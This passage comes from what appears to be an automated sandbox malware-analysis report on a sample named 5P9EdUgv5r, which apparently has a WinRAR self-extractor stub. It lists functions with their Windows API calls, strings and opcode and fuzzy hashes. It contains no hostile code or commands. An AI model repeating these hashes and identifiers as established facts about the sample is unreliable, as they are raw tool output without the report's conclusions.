                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                                • Instruction ID: 532965abf55d4ccf61c6b592921fbc5b4a68323437825c77fa6ac3401b6e99e1
                                • Opcode Fuzzy Hash: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                                • Instruction Fuzzy Hash: 0451B375A00209AFDB10DFA8D885AEEFBF9EF09310F18451AE555E7291E7309941CF70
                                Function 00D7C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • GetTempPathW.KERNEL32(00000800,?), ref: 00D7C54A
                                • _swprintf.LIBCMT ref: 00D7C57E
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • SetDlgItemTextW.USER32(?,00000066,00DA946A), ref: 00D7C59E
                                • _wcschr.LIBVCRUNTIME ref: 00D7C5D1
                                • EndDialog.USER32(?,00000001), ref: 00D7C6B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                • String ID: %s%s%u
                                • API String ID: 2892007947-1360425832
                                • Opcode ID: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                                • Instruction ID: 2a9e2a8345c726b48062816c6f9c237d225f27a078b9f68fdae7d6d60a6ed344
                                • Opcode Fuzzy Hash: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                                • Instruction Fuzzy Hash: B941C271910618AEDB22DBA0DC85EEA77BCEB09701F0490A6E50DE6160F7719BC4CB70
                                Function 00D78E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00D78F38
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D78F59
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AllocByteCharGlobalMultiWide
                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                • API String ID: 3286310052-4209811716
                                • Opcode ID: 3b31bcf6e14a3e0743c1dc341a5baf0030b253ecdb93e04c4a42167a34baea59
                                • Instruction ID: 56ea898eb27f1b405496711ec7649006458937e3ca5d322ebae33b4be2c36a88
                                • Opcode Fuzzy Hash: 3b31bcf6e14a3e0743c1dc341a5baf0030b253ecdb93e04c4a42167a34baea59
                                • Instruction Fuzzy Hash: 3C312A315483117FDB24BB649C4AF6FB768EF41720F14811AF809A61D2FF649A0993B1
                                Function 00D79635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(?,00000000), ref: 00D7964E
                                • GetWindowRect.USER32(?,00000000), ref: 00D79693
                                • ShowWindow.USER32(?,00000005,00000000), ref: 00D7972A
                                • SetWindowTextW.USER32(?,00000000), ref: 00D79732
                                • ShowWindow.USER32(00000000,00000005), ref: 00D79748
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Window$Show$RectText
                                • String ID: RarHtmlClassName
                                • API String ID: 3937224194-1658105358
                                • Opcode ID: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                                • Instruction ID: a22c8c926259e01866697c93bd7260e6c0bbf12f88f2ea76c1df1de6e3cef535
                                • Opcode Fuzzy Hash: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                                • Instruction Fuzzy Hash: EF31AD32004301AFCB25AF64DC49F6BBBA8EF48711F088559FA4D9A262EB34D905CB71
                                Function 00D8BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D8BF79: _free.LIBCMT ref: 00D8BFA2
                                • _free.LIBCMT ref: 00D8C003
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D8C00E
                                • _free.LIBCMT ref: 00D8C019
                                • _free.LIBCMT ref: 00D8C06D
                                • _free.LIBCMT ref: 00D8C078
                                • _free.LIBCMT ref: 00D8C083
                                • _free.LIBCMT ref: 00D8C08E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                • Instruction ID: 24080eac5913b0e24b21dc5bc522bfb7bd2588c7ee959b8a1b675921eaf11cb1
                                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                • Instruction Fuzzy Hash: 741112B2540B44F6D620BBB0CC07FCBB79DEF04710F408856B39966452DB66F9049BB4
                                Function 00D820CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,00D820C1,00D7FB12), ref: 00D820D8
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D820E6
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D820FF
                                • SetLastError.KERNEL32(00000000,?,00D820C1,00D7FB12), ref: 00D82151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: 32a386eb40fea142044f769a27266429ddbe2741d6d16c9b5eb8dd0b7840dcd0
                                • Instruction ID: be0a174f10fdc03735955a43db90d355221366936be38b2efe15accb6c6eb36e
                                • Opcode Fuzzy Hash: 32a386eb40fea142044f769a27266429ddbe2741d6d16c9b5eb8dd0b7840dcd0
                                • Instruction Fuzzy Hash: F001AC32109711AEF7543BB5BC8993B2B45EB21B747350A2BF218952E1EF614D019374
                                Function 00D7DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                • API String ID: 0-1718035505
                                • Opcode ID: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                                • Instruction ID: 5da77717c8d5d1ff1e579263b1765e620a4cb424fe204054418e2bfe5df3041a
                                • Opcode Fuzzy Hash: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                                • Instruction Fuzzy Hash: B001F4316413239B4F725E756D816A637B6AE85312328817BE64DD3300FAB2C885D7F0
                                Function 00D70CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                Download Yara Rule
                                APIs
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D0D
                                  • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                                • LocalFileTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D31
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70D47
                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D70D56
                                • SystemTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D64
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D72
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Time$File$System$Local$SpecificVersion
                                • String ID:
                                • API String ID: 2092733347-0
                                • Opcode ID: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                                • Instruction ID: 14fce58203a712297c9f764f5d0c60112c7402f9039dcd74c5e5499f89270c92
                                • Opcode Fuzzy Hash: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                                • Instruction Fuzzy Hash: 6631C67A90020AEBCB10DFE5D8859EFBBBCFF58700B04455AE959E3610E730AA45CB75
                                Function 00D791B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                                • Instruction ID: 01c5d12b83af5666628fb9dd2b3930ee1a64bd07c3893d033399f1255c7dd171
                                • Opcode Fuzzy Hash: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                                • Instruction Fuzzy Hash: CD21817260020EBBDB15AB20DC91E2BB7ADEB51784B54C129FC4D9A206F270ED4587B4
                                Function 00D88FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                                • _free.LIBCMT ref: 00D88FDC
                                • _free.LIBCMT ref: 00D89004
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D89011
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                                • _abort.LIBCMT ref: 00D89023
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 6e8e4f9225fdd9aba4e844363320fb3031493f7f97d6c04baf2914a1503a43a6
                                • Instruction ID: a4ef3c61c22eb30f795148dbe837b7956e18becf4bc8d274b8238a5d65c7a325
                                • Opcode Fuzzy Hash: 6e8e4f9225fdd9aba4e844363320fb3031493f7f97d6c04baf2914a1503a43a6
                                • Instruction Fuzzy Hash: E1F02236504B116AC22277286C0AF3B2B2ADFC1761F6C011AF659E2296EF20CD02B335
                                Function 00D7D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D2F2
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7D30C
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7D31D
                                • TranslateMessage.USER32(?), ref: 00D7D327
                                • DispatchMessageW.USER32(?), ref: 00D7D331
                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D33C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                • String ID:
                                • API String ID: 2148572870-0
                                • Opcode ID: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                                • Instruction ID: d20bb52081f12802cf3340757c17bb8117396e9db3cc24f9df5413a8b8f5485a
                                • Opcode Fuzzy Hash: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                                • Instruction Fuzzy Hash: 38F0EC72A0121AABCB205BA5DC4CEEBBF7EEF527A1F048012F64AD2150E6359541D7F1
                                Function 00D7C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                • _wcschr.LIBVCRUNTIME ref: 00D7C435
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CompareString_wcschr
                                • String ID: <$HIDE$MAX$MIN
                                • API String ID: 2548945186-3358265660
                                • Opcode ID: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                                • Instruction ID: cddcdfff26dbbffab27b6530e3cd9a0af4e9afce998b8a65d85611a3797203f0
                                • Opcode Fuzzy Hash: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                                • Instruction Fuzzy Hash: 69318076910609AEDF25DA54DC51EEE77BCEB54304F0080AAFA0DD6190FBB19AC48B70
                                Function 00D7ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadBitmapW.USER32(00000065), ref: 00D7ADFD
                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7AE22
                                • DeleteObject.GDI32(00000000), ref: 00D7AE54
                                • DeleteObject.GDI32(00000000), ref: 00D7AE77
                                  • Part of subcall function 00D79E1C: FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                                  • Part of subcall function 00D79E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                                  • Part of subcall function 00D79E1C: LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                                  • Part of subcall function 00D79E1C: LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                • String ID: ]
                                • API String ID: 142272564-3352871620
                                • Opcode ID: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                                • Instruction ID: 3f7aa01555fdc72ffdc2dc26a5d70ed91bc273553177edade2e71a2bcbe17aa6
                                • Opcode Fuzzy Hash: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                                • Instruction Fuzzy Hash: F401C433640316A6C71067689C16E7FBB6AEBC1B52F088015FD08E7291EA718C1596B2
                                Function 00D7CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7CCDB
                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D7CCF1
                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7CD05
                                • SetDlgItemTextW.USER32(?,00000068), ref: 00D7CD14
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText$DialogWindow
                                • String ID: RENAMEDLG
                                • API String ID: 445417207-3299779563
                                • Opcode ID: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                                • Instruction ID: 681e6dfd1703c0f329b4772ded3b322555ab757683c14ac7c8d13a11dd004106
                                • Opcode Fuzzy Hash: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                                • Instruction Fuzzy Hash: 13019C33294312BFD2224F259C08FA73B5CEB4A702F148019F38EE21E1D7A19804C731
                                Function 00D875C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D875E2
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D875F5
                                • FreeLibrary.KERNEL32(00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D87618
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                                • Instruction ID: 4075cd9c47e8252c1a622f0fe22624170a4ab56496ad7981352e1fe800178794
                                • Opcode Fuzzy Hash: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                                • Instruction Fuzzy Hash: F4F04430A0461CBBDB15AF54DC0AB9DBFB9EF04715F14416AF809E2260EB318E44CB74
                                Function 00D6EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
